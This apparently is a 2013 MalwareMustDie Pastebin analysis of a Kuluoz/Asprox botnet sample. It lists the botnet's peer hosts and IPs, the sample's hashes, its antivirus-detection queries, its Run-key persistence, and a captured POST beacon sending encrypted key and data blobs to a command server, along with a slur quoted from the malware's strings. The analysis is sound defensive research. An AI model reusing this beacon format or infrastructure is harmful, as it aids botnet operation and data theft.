Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ==========================
- #MalwareMustDie
- BOTNET KULUOZ/ ASPROX BACK WITH NEW EXCYPTION
- @unixfreaxjp /malware/temp]$ date
- Tue Nov 12 22:23:08 JST 2013
- Peers (host) with ports 8080:
- 66-29-254-132.ds1-static.mia1.net.ststelecom.com
- mail.colegioamazonas.edu.ec
- hosted-by.shineservers.com
- host.colocrossing.com
- web.globalcell.ge
- gunnebojohnson.com
- ==========================
- SAMPLE ANALYZED:
- https://www.virustotal.com/en/file/1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1/analysis/
- MD5 ec52855b7e522a977330519a8a201993
- SHA1 b09e1a0fb067f2114e186bba5d848dbd7d663325
- SHA256 1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1
- // ==============================
- // QUICK REVERSING ANALYSIS:
- // ==============================
- // Accessing the Security Center:
- ROOT\SecurityCenter
- ROOT\SecurityCenter2
- SELECT * FROM AntiVirusProduct
- ROOT\SecurityCenter
- ROOT\SecurityCenter2
- SELECT * FROM FirewallProduct
- // Grabbing Which ssolution you usd:
- displayName
- // Series of request POST command:
- // explanation: The URL name and port numbers are in variables , for proxies.
- http://%[^:]:%d/%s
- // UserAgent Used is Static (not variable) PlainText in binary (Need to decrypt to see it)
- // The method is POST
- // The hash for request was structured "yvy5VtvLVvh6soaja2YuyfrC" in my case.
- // plaintext was used for the form of POST to fetch name="key"; filename="key.bin" and name="data"; filename="data.bin"
- // It is bind to :svchost.exe
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
- GET
- yvy5VtvLVvh6soaja2YuyfrC
- svchost.exe
- Content-Type: multipart/form-data; boundary=
- Content-Disposition: form-data; name="key"; filename="key.bin"
- Content-Type: application/octet-stream
- svchost.exe
- Content-Disposition: form-data; name="data"; filename="data.bin"
- Content-Type: application/octet-stream
- Content-Length: %d
- // Requested command:
- /index.php?r=gate
- Which posting infected ID data of:
- <knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
- // Yes, it is supposed to autorun in:
- Software\Microsoft\Windows\CurrentVersion\Run
- // Self-copied:
- C:\Documents and Settings\User\Local Settings\Application Data\goktqtbh.exe (RANDOM..)
- // Kicking Notedpad:
- 0x4c0 svchost.exe C:\WINDOWS\system32\svchost.exe
- 0x768 notepad.exe C:\WINDOWS\system32\NOTEPAD.EX
- with text...
- FATAL ERROR! Error while open file.
- (hex: 464154414C204552524F5221204572726F72207768696C65206F70656E2066696C652E00 )
- // Botnet (fake?) version..
- 1.0.6, 6-Sept-2010
- // Still the same Rant detected.. see my previous pastebin:
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- You fag!!!!!
- // Added with these:
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- For base!!!!!
- // ==================
- // ENCRYPTION TRACES
- // ==================
- // Data was encrypted using:
- Microsoft Base Cryptographic Provider v1.0
- // Public Key Traces...
- -----BEGIN PUBLIC KEY-----
- jjj
- jjj
- jjj
- jjj
- jjj
- APH
- dLJ1rmxx+bAndp+Cz6+5I
- Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw
- jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U
- 00SNFZ88nyVv33z9+wIDAQAB
- -----END PUBLIC KEY-----
- // Lotta MD5..
- MD5Init
- MD5Update
- MD5Final
- =============================
- RESPONSE FROM KULUOZ PEERS
- ============================
- // DOWNLOADED DATA...
- // data.bin
- 0000 FD B1 64 DF 81 18 D7 F6 9D CB 3A 79 48 B9 BC B9 ..d.......:yH...
- 0010 1E FC C4 7C 3B 1B 0D BF 7A 3E DA 98 4D 09 C3 1B ...|;...z>..M...
- 0020 81 CF EF DF 4E 3A DA ED 69 B0 B9 3E 2F 45 BA 09 ....N:..i..>/E..
- 0030 B5 6C 06 71 D1 A7 15 AA EF B9 A9 7D 27 81 F3 BA .l.q.......}'...
- 0040 92 F6 B7 46 95 C0 06 03 02 DD 0B C1 D9 96 90 27 ...F...........'
- 0050 5F E5 FB E7 B8 C2 9A C8 72 85 A4 41 F5 2F B0 5A _.......r..A./.Z
- 0060 C4 D8 D8 9C 1A 00 63 C3 24 39 6F 23 DA 96 89 63 ......c.$9o#...c
- 0070 F2 8D 0D 15 B3 29 40 D4 91 1B 07 18 22 7E ED B4 .....)@....."~..
- 0080 56 FE D4 42 CF C2 8C 97 19 A9 99 E8 4B 1C 72 9C V..B........K.r.
- 0090 9B 4F AA DF A2 BB BE 72 58 11 7E 8C E1 0A 59 .O.....rX.~...Y
- // ===> This is suppose to be like this: (only example)
- // But can not figure the encryption yet...
- // All previous attempt failed...
- 0000 31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39 149.210.130.18:9
- 0010 39 33 0a 31 38 36 2e 31 31 32 2e 32 31 34 2e 31 93.186.112.214.1
- 0020 35 38 3a 38 30 38 30 0a 32 30 32 2e 32 39 2e 32 58:8080.202.29.2
- 0030 32 39 2e 32 33 32 3a 38 30 38 30 0a 31 37 38 2e 29.232:8080.178.
- 0040 32 30 38 2e 33 35 2e 31 39 30 3a 38 30 38 30 0a 208.35.190:8080.
- 0050 36 34 2e 37 36 2e 31 39 2e 32 34 31 3a 38 30 38 64.76.19.241:808
- 0060 30 0a 39 35 2e 31 37 33 2e 31 38 36 2e 31 38 34 0.95.173.186.184
- 0070 3a 38 30 38 30 0a 31 37 36 2e 31 32 32 2e 32 32 :8080.176.122.22
- 0080 34 2e 36 32 3a 38 30 38 30 0a 38 32 2e 31 39 32 4.62:8080.82.192
- 0090 2e 39 31 2e 32 32 34 3a 38 30 38 30 0a 38 34 2e .91.224:8080.84
- // key.bin (dunno about this yet...)
- 0000 50 AA B1 3A 7E 51 02 90 D7 D4 C1 0D 52 48 AF EE P..:~Q......RH..
- 0010 EA 86 86 6F D3 96 EF 15 22 98 35 B9 15 96 2D B1 ...o....".5...-.
- 0020 27 83 2E DE B7 3B B5 EB BA 74 78 E8 22 28 5D 49 '....;...tx."(]I
- 0030 B8 B1 00 A0 3C 10 D0 95 EB 03 67 7C 51 06 3B D7 ....<.....g|Q.;.
- 0040 1A 95 1E 7E BF 65 C0 CC 36 C2 D0 A2 E3 6D 24 F9 ...~.e..6....m$.
- 0050 9A CE D0 26 1B 0A A4 5E 6F FA 50 80 6C 22 57 24 ...&...^o.P.l"W$
- 0060 26 D9 2F 0D EE F4 80 31 8D 26 24 DC 86 00 D0 DB &./....1.&$.....
- 0070 CF 31 EE C1 CF 9D AA EC 83 3C 99 75 ED 76 62 45 .1.......<.u.vbE
- // encrypted request in POST request...: ps: yvy5VtvLVvh6soaja2YuyfrC is my hashed PC ID
- // HEADER;
- POST /3D498A785E9515E72E2C4E241766ADFDF3DFED4670 HTTP/1.1
- Accept: */*
- Content-Type: multipart/form-data; boundary=yvy5VtvLVvh6soaja2YuyfrC
- Content-Length: 592
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
- Host: 220.67.211.23:8080
- Cache-Control: no-cache
- // DATA...
- yvy5VtvLVvh6soaja2YuyfrC
- Content-Disposition: form-data; name="key"; filename="key.bin"
- Content-Type: application/octet-stream
- ......ON?..u..Y..1.Kf`!.9.*...~.........Ey..p..[>_..S..4/%.N.L4....D.d.....)
- .V....56b.k..E....z.'l.......*..3.h..........w....N
- --yvy5VtvLVvh6soaja2YuyfrC
- Content-Disposition: form-data; name="data"; filename="data.bin"
- Content-Type: application/octet-stream
- .:.U.7T.I..O.{ym....,.i...&.s....U.|....|..z.....$&.........e..v+.6.[....3..........C...W..". h...&I..$t
- /E..4....<KOk....Qt..m.4~.Q|".I..U..u....")a_z$#d..j...
- --yvy5VtvLVvh6soaja2YuyfrC--
- // The two blobs of encryption above are:....
- 442E2E34492E2E54432E2E7B2E750D5335502E2E2E2E2E2E52
- 2E2E33792D2E2E2F2E34202E5D5F2E3F412E492E2E2B4D2E2E
- 2E3F553F2E71552E4B232E0D0A2C2E2E202E2E542E2E2E0D2E
- 2B2E2E26502E2E2E432E2E4D212E2E2E5C2E2E272E2E734157
- 782E2E3E2E2E2E2E2E2E2E2E2E2E2E2E302E2E412E395B2E61
- 6D2E2E2E0D0D0A
- 5F2E462E2E2E2E2E622E2E2E4A232E312E2E2E63326D522E6D
- 212E502E262E6A2E2E2E2E2E2E682E532E2E332E2E2E2E7E2E
- 2E2E2E2E2E2E3D482E2E2E2E2E74642E5D4F2E2E2E2E2E2E78
- 6B2E6E752E502E2E2E2E2E2E5D412E2E2E322E6B2E2E2E2E2E
- 362E7C2E2E2E2E372E4A2E2E2E2E2E78367C7E2E2E512E2E39
- 2E5A2E2E352E67402E2E2E2E2E2E0D0A7B3C7C2E2E73395B2E
- 7D2E662E712E652E460D0D0A
- // ==> this is supposed to be like this to be matched.. (from binary reversing)
- // we need to know encryption used to popped the values of
- id, group, time, version, status and debug.
- <knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
- Pleae take this research from here..
- ---
- #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement